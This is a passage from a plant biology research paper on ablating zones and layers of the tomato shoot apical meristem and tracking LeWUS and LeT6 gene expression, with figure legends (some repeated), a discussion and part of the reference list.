re-established. (G) Expression of LeWUS 4 days after ablation of the CZ. Two new WUS centres are evident at opposite sides of the lesion. (H) Expression of LeT6 in a control meristem. Note down-regulation of LeT6 in the youngest primordium (P1)and at the site of incipient leaf formation (I1). (I) Expression of LeT6 in a control meristem. Note down-regulation of LeT6 in the youngest (P1) and second youngest primordium (P2).(J) Expression of LeT6 6 hours after ablation of the CZ. LeT6 remains active at the periphery of the meristem and is only decreased in the vicinity of the lesion. (K) Expression of LeT6 5 days after ablation of the CZ. The lesion is displaced, and LeT6 is expressed in the new meristem centre and excluded from leaf primordia. (L)Expression of LeT6 4 days after ablation of the CZ. Two new LeT6-expressing meristems are induced on opposite sides of the lesion. P3, P2, and P1 indicate leaf primordia that were present at the beginning of the experiment; I1,I2, I3, and I4 indicate primordia formed after the ablation. Scale bars: 100 μm. Fig. 3. Expression of the meristem marker genes LeWUS and LeT6 in the meristem after ablation of the CZ. Gene expression was visualised by in situ hybridisation with 35S-labelled riboprobes. Signal appears as yellow grains. All images are transverse sections, except for I and J which are longitudinal sections. Position of the lesion is indicated by yellow arrowheads. (A-G) Expression of LeWUS. (H-L) Expression of LeT6. (A) Expression of LeWUS in a control meristem. (B)Expression of LeWUS immediately after ablation of the CZ (yellow arrowhead). No LeWUS expression can be detected. (C) Expression of LeWUS 1 day after ablation of the CZ. A ring-shaped area around the lesion expresses LeWUS at low levels (arrows). (D) Expression of LeWUS 2 days after ablation of the CZ. The lesion (arrowhead) is closed, and the LeWUS signal becomes confined to one side of the lesion. (E) Expression of LeWUS 4 days after ablation of the CZ. The LeWUS-expressing zone at the flank has resolved into a new WUS centre with normal dimensions (compare with A). (F) Expression of LeWUS 6 days after ablation of the CZ. A new functional meristem centre with a normal WUS centre has been re-established. (G) Expression of LeWUS 4 days after ablation of the CZ. Two new WUS centres are evident at opposite sides of the lesion. (H) Expression of LeT6 in a control meristem. Note down-regulation of LeT6 in the youngest primordium (P1)and at the site of incipient leaf formation (I1). (I) Expression of LeT6 in a control meristem. Note down-regulation of LeT6 in the youngest (P1) and second youngest primordium (P2).(J) Expression of LeT6 6 hours after ablation of the CZ. LeT6 remains active at the periphery of the meristem and is only decreased in the vicinity of the lesion. (K) Expression of LeT6 5 days after ablation of the CZ. The lesion is displaced, and LeT6 is expressed in the new meristem centre and excluded from leaf primordia. (L)Expression of LeT6 4 days after ablation of the CZ. Two new LeT6-expressing meristems are induced on opposite sides of the lesion. P3, P2, and P1 indicate leaf primordia that were present at the beginning of the experiment; I1,I2, I3, and I4 indicate primordia formed after the ablation. Scale bars: 100 μm. ### Establishment of a new meristem centre is associated with ectopic induction of theWUSCHEL gene The cells in the CZ and in the PZ differ in cell size, subcellular organisation, cell division rate, gene expression, and the ability to form organs (Steeves and Sussex,1989; Lyndon,1998; Fletcher,2002; Reinhardt and Kuhlemeier, 2002). Therefore, if cells at the periphery are to reorganise a new meristem centre, they need to be reprogrammed. The WUSCHEL gene in Arabidopsis confers stem cell identity to the overlying cell layers (Mayer et al.,1998). Therefore, WUSCHEL is a good candidate for a role in reinitiation of a new centre, and a good marker for CZ identity. WUSCHEL expression and loss-of-function phenotypes are conserved between Arabidopsis and Petunia hybrida, a close relative of tomato (Stuurman et al.,2002). We monitored the expression of a tomato WUShomologue, LeWUS, after ablation of the CZ. Ablation of the CZ eliminated the LeWUS-expressing cells completely(Fig. 3A,B). However, after 1 day, LeWUS was ectopically induced in a ring-shaped region surrounding the lesion (Fig. 3C, arrows). Two days after the ablation, LeWUSexpression became stronger and confined to one side of the lesion(Fig. 3D). After 4 days, a new LeWUS-expressing cell cluster was established, comparable in size with the LeWUS expression domain in control meristems(Fig. 3E, compare with 3A). After 6 days, a functional meristem was evident that grew out to the side,away from the lesion (Fig. 3F). Sometimes, two new LeWUS-expressing centres (WUS centres) were established on opposite sides of the lesion(Fig. 3G). Such meristems are likely to represent early stages of apices that would have split at later stages (compare with Fig. 2J). Organ formation continued after ablations of the CZ, indicating that basic meristem functions in the PZ were not affected. In order to confirm the maintenance of meristem identity in the PZ, we analysed the expression of the LeT6 homeobox gene (also referred to as TKn2), a marker for meristem identity (Chen et al.,1997; Parnis et al.,1997). In untreated controls, LeT6 was consistently expressed in the CZ and the PZ but down-regulated in the leaf primordia and the site of incipient leaf formation (I1)(Fig. 3H,I), in a manner similar to the homologous genes KNOTTED1 in maize(Jackson et al., 1994) and SHOOT MERISTEMLESS in Arabidopsis(Long and Barton, 2000). This is in contrast to previous reports that found LeT6 to be expressed across the meristem, with only moderate reduction in leaf primordia(Chen et al., 1997; Parnis et al., 1997). After ablation of the CZ, LeT6 continued to be expressed in the remaining cells at levels comparable to those in the controls(Fig. 3J). In parallel with the re-establishment of one or two new meristem centres, LeT6-expressing cells increased either on one (Fig. 3K), or on two opposite sides of the lesion(Fig. 3L). Taken together, we have shown that after ablation of the CZ, LeWUSis induced in cells at the flank within 1 day. This increase in LeWUSexpression is unlikely to be caused by proliferation of a few LeWUS-expressing cells that might have escaped destruction. Also, the new LeWUS signal always occurred at some distance from the lesion. Therefore, the LeWUS mRNA at the flank appears to result from ectopic transcriptional induction of LeWUS in cells that did not express WUS before the ablation. LeWUS induction preceded the establishment of a new meristem centre by approximately 2 days. In parallel with ongoing organogenesis, the meristem marker gene LeT6 continued to be expressed at the periphery, even after ablation of all LeWUS-expressing cells. ### Ablation in the PZ and stress treatments do not affect the function of the CZ A major concern with all surgical ablations is that they may cause wound or stress responses that complicate or even invalidate the conclusions from the experiments. For example, it could be argued that ectopic induction of WUS, or establishment of a new growth centre, may be influenced not only by the loss of the CZ cells, but also by wound effects from the lesions,or by secondary stress signals. In order to exclude such effects, we performed a number of control experiments. First, we performed laser ablations of similar magnitude not in the CZ but in the PZ at the site of incipient leaf formation(Fig. 4A). Such ablations affected the positioning of new leaves in two ways. Either the site of the ablation was skipped and the next primordium was initiated at the next expected position (Fig. 4B,C),or the primordia were displaced to either side of the lesion(Fig. 4D,E), resulting in a smaller or larger divergence angle than expected. If ablations were performed in the centre of the youngest primordium (P1), it became split(Fig. 4F). However, we never observed a reorientation of the growth axis after ablations at the PZ,indicating that despite the strong local effects on organ formation, the ablations did not affect the neighbouring CZ or lead to establishment of a new meristem centre. To confirm this, we analysed LeWUS expression after ablations at the PZ (Fig. 4G). LeWUS continued to be expressed in an area similar to that in control meristems although the expression level tended to decrease after ablation(Fig. 4H). The fact that ectopic induction of LeWUS was not found after peripheral ablations shows that wounding per se is not sufficient to induce ectopic LeWUSexpression. Fig. 4. Control treatments do not influence the central zone. (A-H) Laser ablations(yellow arrowheads) as in Fig. 2C, but at the periphery instead of the centre. (A) Laser ablation at the periphery approximately at the site of incipient leaf formation. (B,C)Consecutive video images of a single meristem with an ablation as in (A). Cut primordia are dark green, and the youngest primordia are highlighted in yellow for clarity. (B) Immediately after ablation (t0); (C) 2 days after ablation. Leaf formation at the site of the ablation is suppressed(arrowheads), while two new primordia (I1 and I2) were induced at the next two expected positions. (D,E) Consecutive video images of a single meristem with an ablation as in (A). (D) t0; (E) 2 days after ablation. I1 is initiated closer to P1 than normal, resulting in a divergence angle of approximately 90° instead of 137°. Arrowheads point to the lesion. (F) Ablation on P1. 2 days after the ablation (arrowhead), the primordium has recovered and split in two halves. (G) In situ hybridisation with a LeWUS probe 6 hours after an ablation at the periphery. The LeWUS expression domain remained normal. (H) 2 days after ablation, the lesion was displaced(arrowhead), and LeWUS continued to be expressed in the normal area.(I-L) Effects 4 days after treatments of the CZ with stress metabolites and oxidants. (I) Control. (J) Treatment with 1 mM salicylic acid. (K) Treatment with 1 mM hydrogen peroxide. (L) Treatment with 0.1 mM Paraquat. Treatments did not affect the formation rate or the positioning of leaf primordia. Lanolin paste (red) remained in the centre, indicating that the growth centre persisted. P5, P4, P3, P2, and P1 indicate the bases of pre-existing leaf primordia that were removed at the beginning of the experiment; I1, I2 and I3 indicate primordia formed after the ablation. Scale bars: 100μm. Fig. 4. Control treatments do not influence the central zone. (A-H) Laser ablations(yellow arrowheads) as in Fig. 2C, but at the periphery instead of the centre. (A) Laser ablation at the periphery approximately at the site of incipient leaf formation. (B,C)Consecutive video images of a single meristem with an ablation as in (A). Cut primordia are dark green, and the youngest primordia are highlighted in yellow for clarity. (B) Immediately after ablation (t0); (C) 2 days after ablation. Leaf formation at the site of the ablation is suppressed(arrowheads), while two new primordia (I1 and I2) were induced at the next two expected positions. (D,E) Consecutive video images of a single meristem with an ablation as in (A). (D) t0; (E) 2 days after ablation. I1 is initiated closer to P1 than normal, resulting in a divergence angle of approximately 90° instead of 137°. Arrowheads point to the lesion. (F) Ablation on P1. 2 days after the ablation (arrowhead), the primordium has recovered and split in two halves. (G) In situ hybridisation with a LeWUS probe 6 hours after an ablation at the periphery. The LeWUS expression domain remained normal. (H) 2 days after ablation, the lesion was displaced(arrowhead), and LeWUS continued to be expressed in the normal area.(I-L) Effects 4 days after treatments of the CZ with stress metabolites and oxidants. (I) Control. (J) Treatment with 1 mM salicylic acid. (K) Treatment with 1 mM hydrogen peroxide. (L) Treatment with 0.1 mM Paraquat. Treatments did not affect the formation rate or the positioning of leaf primordia. Lanolin paste (red) remained in the centre, indicating that the growth centre persisted. P5, P4, P3, P2, and P1 indicate the bases of pre-existing leaf primordia that were removed at the beginning of the experiment; I1, I2 and I3 indicate primordia formed after the ablation. Scale bars: 100μm. In order to test for effects of secondary stress signals that might be generated by ablation, we treated the centre of meristems with salicylic acid(Fig. 4J),H2O2 (Fig. 4K) Paraquat (Fig. 4L) or jasmonic acid (not shown). After all these treatments,leaves were formed at normal rates and at the normal position. In all cases,the lanolin paste was not displaced at all(Fig. 4J,L) or only slightly(Fig. 4K), indicating that the centre of the meristem was still functional and had not moved compared to controls (Fig. 4I). From these control treatments, it can be concluded that ectopic induction of LeWUS and initiation of a new meristem centre after ablations of the CZ is a specific response to the removal of the CZ, and not a general stress response to wounding or secondary stress signals. It follows that under normal conditions, LeWUS expression at the flank is repressed by cells in the CZ, and that this block is released by the ablations. ### Ablation of the distal part of the CZ does not lead to rapid ectopic induction of LeWUS The ablations discussed in the previous sections removed the entire CZ including the LeWUS-expressing cells (Figs 2, 3). To test the effect of removal of only the distal portion of the CZ, we performed ablations at the meristem centre that consisted of about 8 cells in diameter and reached approximately 4-5 cell layers deep. Such ablations removed most of the cells distal to the LeWUS-expressing cells, presumably including all stem cells, while leaving the LeWUS-expressing cells intact(Fig. 5A,B, compare with Fig. 2B). We assume that the rapid induction of LeWUS after elimination of the entire CZ is due to the release of inhibition from cells in the centre. If this inhibition originates from the distal cells of the CZ, the result of deep and partial ablations would be expected to be similar, because in both cases, the distal cells are removed. If however, cells in deeper layers were responsible for LeWUS limitation, then the outcome of the complete and partial CZ ablations would be expected to be different. Fig. 5. Expression of LeWUS after ablation of the stem cells. (A)Longitudinal section through a meristem after ablation of the upper four to five cell layers. (B-D) Transverse sections showing LeWUS expression at various times after ablation as in A. (B) Immediately after ablation. (C)One day after ablation. (D) Three days after ablation. P1 indicates the leaf primordium that was present at the beginning of the experiment;I1 denotes a primordium that was formed after the ablation. Scale bars: 100 μm. Fig. 5. Expression of LeWUS after ablation of the stem cells. (A)Longitudinal section through a meristem after ablation of the upper four to five cell layers. (B-D) Transverse sections showing LeWUS expression at various times after ablation as in A. (B) Immediately after ablation. (C)One day after ablation. (D) Three days after ablation. P1 indicates the leaf primordium that was present at the beginning of the experiment;I1 denotes a primordium that was formed after the ablation. Scale bars: 100 μm. After ablation of the distal cells, we followed LeWUS expression in the meristem for a week, with emphasis on the first 3 days. It was of special interest to see whether the LeWUS-expressing area in the meristem expands laterally, as would be the case if peripheral cells were released from suppression after the ablation. However, the LeWUS-expressing domain in the CZ remained approximately the same size after 1 and 3 days (Fig. 5C,D) and after 2, 4 and 6 days (data not shown). Nevertheless,ablated meristems were able to recover, and to establish a new functional growth centre (data not shown). It is possible that after partial ablations, a gradual shift of the LeWUS-expressing domain occurred, rather than an overall expansion. Such a shift, which would escape detection by in situ hybridisation analysis, could allow for a new growth centre to be induced beside the lesion. ### The role of the L1 layer in meristem function The previous experiments, which involved complete and partial ablations of zones of the meristem (CZ and PZ), showed the high efficiency with which the remaining tissues compensated for the loss by adjusting their fates. In another series of experiments, we asked what the role of L1 is in meristem development, and whether the layers of the meristem are equally flexible as the zones. By single low energy pulses of the laser directed at the summit of the meristem, small patches of cells in the centre of the L1 layer were ablated (Fig. 6A,B). Similar to ablations of the entire CZ(Fig. 2), such lesions did not perturb organ formation at the periphery(Fig. 6C-E). After 5 days, the meristems had formed 3.28±0.93 (s.d.) new leaf primordia(n=73), compared to controls that had formed 2.86±0.66 (s.d.)leaf primordia (n=14), and the primordia were initiated at the normal positions. However, the development of the cells just below the lesion was altered (Fig. 6F). Instead of dividing anticlinally to propagate the continuous layers of the meristem, they started to divide predominantly periclinally, leading to the formation of cell stacks that grew out perpendicularly to the surface(Fig. 6F). This indicates that the L1 layer normally exerts a restriction to such cell divisions. Later, superficial lesions were displaced from the meristem, indicating that the growth centre of the meristem was displaced to the flank (data not shown). However, this shift of the growth centre appeared to be delayed compared to the establishment of a new growth centre after ablations of the entire CZ. After 6 days, only 51 out of 73 superficial lesions were displaced from the meristem (70%), whereas in the case of ablations of the entire CZ after 4 days, i.e. 2 days earlier, already 19 out of 22 lesions were displaced from the meristem (86%). Fig. 6. Laser ablations of the L1 layer in the centre have local effects on cell division orientation, but not on meristem maintenance and phyllotaxis.(A) Scanning electron micrograph of a meristem immediately after superficial ablation in the centre (yellow arrowhead). (B) Longitudinal section of a meristem immediately after treatment as in A. (C-E) Consecutive video images of a single meristem after ablation as in A: (C) 1 day, (D) 2 days and (E) 3 days after ablation. Note normal phyllotaxis. (F) Longitudinal section through a meristem 5 days after ablation as in A. Note periclinal divisions in cells just below the ablation. P2 and P1 indicate leaf primordia that were present at the beginning of the experiment; I1and I2 indicate primordia formed after the ablation. Scale bars:100 μm. Fig. 6. Laser ablations of the L1 layer in the centre have local effects on cell division orientation, but not on meristem maintenance and phyllotaxis.(A) Scanning electron micrograph of a meristem immediately after superficial ablation in the centre (yellow arrowhead). (B) Longitudinal section of a meristem immediately after treatment as in A. (C-E) Consecutive video images of a single meristem after ablation as in A: (C) 1 day, (D) 2 days and (E) 3 days after ablation. Note normal phyllotaxis. (F) Longitudinal section through a meristem 5 days after ablation as in A. Note periclinal divisions in cells just below the ablation. P2 and P1 indicate leaf primordia that were present at the beginning of the experiment; I1and I2 indicate primordia formed after the ablation. Scale bars:100 μm. Since the L1 layer appears to influence the development of subtending meristem cells, we were interested to see whether leaf formation required the L1 layer. Owing to the curved surface of the meristem,the laser beam could not be focused evenly onto larger regions of the L1 layer. Therefore, we developed a microsurgical method to ablate larger portions of the L1 layer. Incisions were made on the abaxial(outer) side of young primordia at the base. The incisions were made as deep as possible without severing the epidermis of the adaxial side (towards the meristem). Then the primordia were pulled over the meristem, drawing with them a sector of the L1 layer. This technique led to surprisingly clean removal of L1 while leaving the L2 layer intact(Fig. 7A,D,G). Fig. 7. Surgical ablation of the L1 layer leads to aberrant cell division and differentiation in L2 and L3. (A-C)Consecutive video images of a single meristem from which the left half of the L1 layer was removed. Cut primordia are coloured in dark green, and the youngest primordia are highlighted in yellow: (A) t0, (B) 2 days and (C) 4 days after ablation. Organ formation continues from the unperturbed half, and the meristem centre is shifted to the right. (D-F)Consecutive video images of a meristem from which most of the L1layer has been removed: (D) t0, (E) 2 days, (F) 4 days. Meristem activity ceases. Note that a final primordium is formed at the normal position(I1). (G-I) Longitudinal sections through meristems after a surgical ablation as in D. (G) Note the continuity of the L2 layer at the site of the ablation (between arrows). (H) Two days after ablation as in (D). A last primordium was formed (I1), while the cells at the ablated site (arrowhead) became vacuolated and started to divide periclinally.(I) Five days after ablation as in (D). Note stacks of cells resulting from repeated periclinal division, and increasing vacuolisation (arrowhead). (J)Close up of (I). Note different cell division patterns and cell shape in the area where a primordium had been removed at the beginning of the experiment(arrow), compared to the site at which the L1 was ablated(arrowhead). (K-M) In situ hybridisations with a 35S-labelled antisense probe against LeT6. Tomato meristems were treated as in(D), and fixed for analysis either immediately (K), or after 2 days (L), and 5 days (M). LeT6 signal can be observed at the ablated site until 2 days after the ablation (L). After 5 days, the vacuolated cells exhibited low levels of LeT6 mRNA, whereas high levels of LeT6 remained in the lower L3 cells that exhibit less vacuolisation. P4,P3, P2 and P1 indicate the bases of preexisting leaf primordia that were removed at the beginning of the experiment; I1 and I2 indicate primordia formed after the ablation. Scale bars: 100 μm (A-I, K-M); 50 μm (J). Fig. 7. Surgical ablation of the L1 layer leads to aberrant cell division and differentiation in L2 and L3. (A-C)Consecutive video images of a single meristem from which the left half of the L1 layer was removed. Cut primordia are coloured in dark green, and the youngest primordia are highlighted in yellow: (A) t0, (B) 2 days and (C) 4 days after ablation. Organ formation continues from the unperturbed half, and the meristem centre is shifted to the right. (D-F)Consecutive video images of a meristem from which most of the L1layer has been removed: (D) t0, (E) 2 days, (F) 4 days. Meristem activity ceases. Note that a final primordium is formed at the normal position(I1). (G-I) Longitudinal sections through meristems after a surgical ablation as in D. (G) Note the continuity of the L2 layer at the site of the ablation (between arrows). (H) Two days after ablation as in (D). A last primordium was formed (I1), while the cells at the ablated site (arrowhead) became vacuolated and started to divide periclinally.(I) Five days after ablation as in (D). Note stacks of cells resulting from repeated periclinal division, and increasing vacuolisation (arrowhead). (J)Close up of (I). Note different cell division patterns and cell shape in the area where a primordium had been removed at the beginning of the experiment(arrow), compared to the site at which the L1 was ablated(arrowhead). (K-M) In situ hybridisations with a 35S-labelled antisense probe against LeT6. Tomato meristems were treated as in(D), and fixed for analysis either immediately (K), or after 2 days (L), and 5 days (M). LeT6 signal can be observed at the ablated site until 2 days after the ablation (L). After 5 days, the vacuolated cells exhibited low levels of LeT6 mRNA, whereas high levels of LeT6 remained in the lower L3 cells that exhibit less vacuolisation. P4,P3, P2 and P1 indicate the bases of preexisting leaf primordia that were removed at the beginning of the experiment; I1 and I2 indicate primordia formed after the ablation. Scale bars: 100 μm (A-I, K-M); 50 μm (J). When approximately half of the L1 was removed(Fig. 7A-C), leaf formation continued, but only from the intact half of the meristem. During the following days, the lesions were displaced from the meristem, indicating that the growth centre of the meristem had been shifted towards the intact flank(Fig. 7C). When most of the L1 was removed (Fig. 7D), leaf formation was abolished, either immediately, or after the formation of one last leaf (that was initiated only when a small marginal strip of L1 was retained; Fig. 7E). After 4 days, these meristems became dramatically expanded(Fig. 7F). Histological sections revealed that the enlargement of the meristem was due both, to cell expansion and cell division at the peeled site(Fig. 7G-J). Two days after L1 ablations, enlarged cells and periclinal divisions were evident(Fig. 7H), and after 5 days,stacks of vacuolated cells had been formed at the peeled site(Fig. 7I,J). This change in cell behaviour is similar to, although more accentuated than, that following local L1 ablations (compare with Fig. 6F). The ordered cell stacks formed at the site of the L1 ablations contrasted with the irregular callus formed at the cut surfaces of primordia bases(Fig. 7J). The fact that organ formation was never observed at an area from which the L1 layer was ablated points to a special role of this layer in organ formation. However, since the loss of L1 also led to the loss of meristem characteristics in subtending cells, the defect in organogenesis could also be indirectly caused by the loss of meristem identity. To test this possibility, we followed the expression of the meristem marker LeT6. This gene continued to be expressed for several days after L1ablation (Fig. 7K-M), but concomitantly with vacuolization and periclinal divisions, LeT6expression faded away in the upper layers(Fig. 7M). Thus the loss of meristem identity developed more slowly than the immediate block of organ formation at the ablated site. ### Combining classical ablation approaches with modern technology In recent years, our understanding of the functioning of the shoot apical meristem has dramatically expanded, mostly as a result of sophisticated genetic analyses in Arabidopsis thaliana. The current genetics-based models do, however, incorporate conclusions based on classical tissue ablation experiments. The latter fascinating and highly informative experiments were performed at a time when many of the tools that we now take for granted were not yet available. Our present study revisits these classical experiments. Thanks to modern tools, such as high power binocular microscopes, scanning electron microscopy, sterile meristem culture and laser-directed tissue ablation, we were able to remove smaller and better-defined pieces of tissue,and to follow the effect of the manipulations from early time points. In addition, we performed important control experiments to confirm that the responses to ablations are not due to general wound effects, an issue that today is probably considered more critical than it was half a century ago. Another important modern tool is molecular markers, which allowed us to establish tissue identities. We note, however, that the number of markers available in tomato is rather limited. Similarly, it would have been very useful to perform these manipulations in mutant backgrounds. It is unfortunate that its small and inaccessible meristem makes Arabidopsis completely unsuitable for this type of experiments. Micromanipulation experiments, such as the ones presented here, can only provide indications of novel dynamic interactions in the meristem. They can direct the further genetic and biochemical experiments that are required to build definitive molecular models. ### Ablation of the CZ leads to the establishment of a new meristem centre from the PZ but has no direct effect on organogenesis Clonal analysis has demonstrated that the postembryonic leaves originate from a few stem cells in the CZ (Stewart and Dermen, 1970), emphasising the pivotal function of the CZ. The importance of the CZ is also supported by a wealth of genetic data. For instance, expression of the WUS gene in the CZ is necessary and sufficient for stem cell induction and maintenance(Mayer et al., 1998; Schoof et al., 2000). Confirming and extending classical ablation experiments, we show here that after removal of the CZ, including the LeWUS-expressing cells by infrared laser ablation, a new functional meristem centre is rapidly and efficiently established from cells in the PZ. This indicates that ablated stem cells can be replaced by cells at the periphery. After ablation of the CZ, leaves continued to be initiated without the slightest lag. Notably, several new leaves were formed before the new growth centre became evident, indicating that despite the lack of stem cells, the pool of meristematic cells was large enough to sustain organogenesis for several plastochrons. This temporal sequence of events clearly indicates that the CZ has no direct role in organ formation and patterning of the apex,except as the ultimate source of cells(Steeves and Sussex, 1989). Mutants with perturbed CZ frequently exhibit defects in organogenesis,however, this effect is indirect. For instance, the cessation of leaf formation in the wus mutant is an indirect effect of stem cell depletion (Mayer et al.,1998). Similarly, the irregular phyllotaxis in the clavata mutants is likely to be an indirect effect of irregular enlargement of the apex (Clark et al.,1993; Clark et al.,1995). ### LeWUS induction in the PZ precedes initiation of a new meristem centre Differences in the cells of the CZ and PZ have been identified by several different means, e.g. cytological markers, gene expression profiles, cell division activity, organogenic capacity, etc. Consequently, the establishment of a new meristem centre from the periphery involves the reprogramming of cells. After ablation of the CZ, the tomato WUS homologue LeWUS was rapidly induced in the PZ, before a new meristem centre became apparent (compare Fig. 2E and Fig. 3D). We propose that LeWUS expression in the PZ induced the overlying cells to regenerate a new growth centre. In Arabidopsis, limitation of the WUS-expressing OC is mediated by the CLV3 signal from the overlying stem cells(Simon, 2001; Fletcher, 2002; Gross-Hardt and Laux, 2003). The observation of ectopic WUS induction after ablations of the CZ is compatible with an inhibitory signal coming from the centre and acting on the periphery. However, on the basis of this experiment, it cannot be decided which cells in the CZ are responsible for WUS suppression. To address this question we ablated only the distal portion of the CZ, approximately eight cells wide and approximately four to five cell diameters deep(Fig. 5). This treatment left the LeWUS domain intact (compare Fig. 2B and Fig. 5A; 5B), but is likely to have destroyed most if not all of the overlaying stem cells. Three days after ablation of the distal cells, the LeWUS zone had remained approximately the same size (Fig. 5), hence, ectopic induction of LeWUS was not observed. It is conceivable that the partial ablations led to a slower and more moderate induction of LeWUS or a gradual shift of the OC, which escaped detection by in situ analysis. Alternatively, considering the large difference between the responses to superficial and deep ablations, the cells in deeper layers may play a special role in preventing ectopic LeWUS induction. For instance, the LeWUS-expressing cells could inhibit LeWUSexpression in neighbouring cells by a mechanism analogous to lateral inhibition. It is also conceivable that, as yet, unknown signals are involved. This type of micromanipulation experiments can provide useful indications of dynamic interactions that may remain hidden in genetic approaches. However, we emphasise again that with the paucity of mutants and molecular markers in tomato it is hard to arrive at conclusive molecular models. ### The L1 layer controls cell division orientation and meristem maintenance Ablations of the L1 layer led to local changes in cell division patterns from anticlinal to periclinal in the subtending cell layers (Figs 6, 7). This was the case irrespective of whether the ablations affected only a limited area or the entire meristem surface. This regular cell division pattern was clearly different from irregular callus-like proliferation at the base of cut primordia (Fig. 7J), indicating that it is a characteristic feature of meristem cells. Since similar aberrations in cell division patterns were not found in any other ablation, we propose that this response is not a general wound response, but is specifically due to the loss of L1. Genetic perturbation of the embryo protodermal layer (corresponding to the L1 layer) by L1-specific expression of a cytotoxic gene led to defects in subtending cell layers of Arabidopsis root(Baroux et al., 2001). In particular, the cell division pattern was affected, resulting in supernumerary cell tiers in the embryonic root tip, similar to the development after our L1 ablations. Thus, the L1 layer controls cell division patterns in subtending cell layers, and prevents periclinal cell divisions. Secondly, we observed a gradual loss of meristem identity, as judged by increasing cell expansion and decreasing LeT6 expression. This occurred only when most of the L1 layer was ablated. In combination with periclinal cell divisions (see above), this resulted in stacks of vacuolated cells that resembled differentiating stem cortex tissue. Therefore,L1 not only controls cell division, but also prevents cell differentiation in lower cell layers. ### Role of the L1 layer in organ formation It has been proposed that biophysical forces in the L1 layer regulate organ formation and meristem patterning, with no necessity for specific chemical signals in the meristem (Green,1996). Biophysical regulation is thought to be based on tensile and compressive forces within the meristem. According to these models, such forces result from the geometry and the growth of the apex and operate on the meristem (including the L1) as a whole. Although computational modelling can recreate natural phyllotactic patterns(Green, 1992; Green, 1996), experimental evidence for the involvement of biophysics has proved difficult to gain. In our experiments, ablations had only local effects on organ formation and positioning, and none of the ablations had systemic' effects on organ formation in unperturbed parts of the meristem. Therefore, our results do not support a role for biophysical mechanisms in meristem patterning. However, we emphasise that once the site of organ formation is determined, the execution of the organogenic programme is likely to involve biophysics, particularly the modulation of cell wall properties (Fleming et al., 1997; Reinhardt et al., 1998; Pien et al.,2001). An immediate effect of L1 ablations was the complete block of organ formation at the ablated site, although the remaining L2 and L3 cells were still able to divide and to expand (see above). Could the lack of organ formation be due to the loss of meristem identity in subtending layers? We do not think so, since the loss of meristem identity developed only gradually, and after 5 days meristematic cells were still evident in L3. In contrast, the block in organ formation was immediate and complete, since an organ was never formed at a site devoid of L1. Therefore, the block in organ formation is unlikely to be an indirect consequence of meristem degeneration, but appears to be a direct consequence of the loss of L1. The similarity of the defects caused by genetic L1 ablations with the phenotypes of bodenlosand monopteros mutants may indicate a role of the L1 layer in auxin-related patterning of the embryonic root(Baroux et al., 2001). Since leaf formation at the shoot meristem is controlled by auxin(Reinhardt et al., 2000; Kuhlemeier and Reinhardt,2001; Reinhardt and Kuhlemeier, 2002; Stieger et al., 2002), the fact that leaf formation was blocked at sites bare of L1, could point also to an auxin-related role of L1in this process. Since CZ ablations did not affect leaf formation, it is likely that the auxin-based mechanism operates in the PZ, but not in the CZ. While leaf formation in the vegetative meristem requires the L1layer (see above), there is an influence of the lower layers in flower development. lateral suppressor (ls) mutants of tomato lack petals. However, a periclinal chimera with an ls mutant L1layer and wild type L2 and L3 layers has normal flowers(Szymkowiak and Sussex, 1993),indicating that in this case, the L1 responded to organogenic signals from lower layers. It is conceivable that factors from the L1 layers, as well as factors from lower layers, are required to allow organ formation. ### Regenerative capacities of plant cells An important feature of L1 ablations was the lack of regeneration. In contrast to the rapid regeneration of a new growth centre after ablation of the CZ, the L1 could never be regenerated, even after ablations of limited extent. Although single cells that are displaced to the L1 from the L2 layer can adopt L1identity (Tilney-Basset,1986), this depends on the presence of L1 neighbours. Without information from neighbouring L1 cells, L1identity cannot be expressed in L2 cells, therefore, de novo formation of L1 (or the epidermis) is not possible in plants(Bruck and Walker, 1985). The re-establishment of a new CZ after ablation implies rapid and efficient regeneration of functional stem cells from organogenic cells at the periphery. This reveals a remarkable flexibility of plant cell fate compared to animals. It has long been assumed that adult animal stem cells cannot be replaced, once they are lost. However, evidence is now accumulating that under certain experimental conditions, stem cells can be (re)generated by dedifferentiation or transdifferentiation from cells with other (more differentiated) identities(Blau et al., 2001). However,this occurs at low frequency and may, in some cases, be due to activation of hidden pluripotent stem cells rather than to plasticity of differentiated cells (Weissman, 2000). It is therefore a matter of debate, to what extent regeneration of stem cells is relevant for animal development (Holden and Vogel, 2002). In contrast, establishment of new stem cells in plants is clearly part of normal development. Reinitiation of stem cells in axillary meristems is the basis for the branched architecture of plants, and routinely allows breeders to clonally propagate plants much more easily than animals. We thank Lara Reale and Francesco Ferranti for generous technical advice while hosting one of us (T.M.), Neelima Sinha for providing the LeT6cDNA, and Jennifer Fletcher, Thomas Laux, Pia A. Stieger and Jeroen Stuurman for critical reading of the manuscript. This work was supported by a Swiss National Science Foundation grant to C.K. and D.R. Baroux, C., Blanvillain, R., Moore, I. R. and Gallois, P.( 2001 ). Transactivation of BARNASE under the AtLTP1 promoter affects the basal pole of the embryo and shoot development of the adult plant in Arabidopsis. Plant J. 28 , 503 -515. Blau, H. M., Brazelton, T. R. and Weimann, J. M.( 2001 ). The evolving concept of a stem cell: Entity or function? Cell 105 , 829 -841. Brand, U., Fletcher, J. C., Hobe, M., Meyerowitz, E. M. and Simon, R. ( 2000 ). Dependence of stem cell fate in Arabidopsis on a feedback loop regulated by CLV3 activity. Science 289 , 617 -619. Bruck, D. K. and Walker, D. B. ( 1985 ). Cell determination during embryogenesis in Citrus jambhiri. II. Epidermal differentiation as a onetime event. Amer. J. Bot . 72 , 1602 -1609. Chen, J.-J., Janssen, B.-J., Williams, A. and Sinha, N.( 1997 ). A gene fusion at a homeobox locus: Alterations in leaf shape and implications for morpholocical evolution. Plant Cell 9 , 1289 -1304. Clark, S. E. Running, M. P. and Meyerowitz, E. M.( 1993 ). CLAVATA1, a regulator of meristem and flower development in Arabidopsis. Development 119 , 397 -418. Clark, S. E. Running, M. P. and Meyerowitz, E. M.( 1995 ). CLAVATA3 is a specific regulator of shoot and floral meristem development affecting the same process as CLAVATA1. Development 121 , 2057 -2067. Clark, S. E. Williams, R. W. and Meyerowitz, E. M.( 1997 ). The CLAVATA1 gene encodes a putative receptor kinase that controls shoot and floral meristem size in Arabidopsis. Cell 89 , 575 -585. Fleming, A. J., McQueen-Mason, S., Mandel, T. and Kuhlemeier,C. ( 1997 ). Induction of leaf primordia by the cell wall protein expansin. Science 276 , 1415 -1418. Fletcher, J. C., Brand, U., Running, M. P., Simon, R. and Meyerowitz, E.M. ( 1999 ). Signaling of cell fate decisions by CLAVATA3 in Arabidopsis shoot meristems. Science 283 , 1911 -1914. 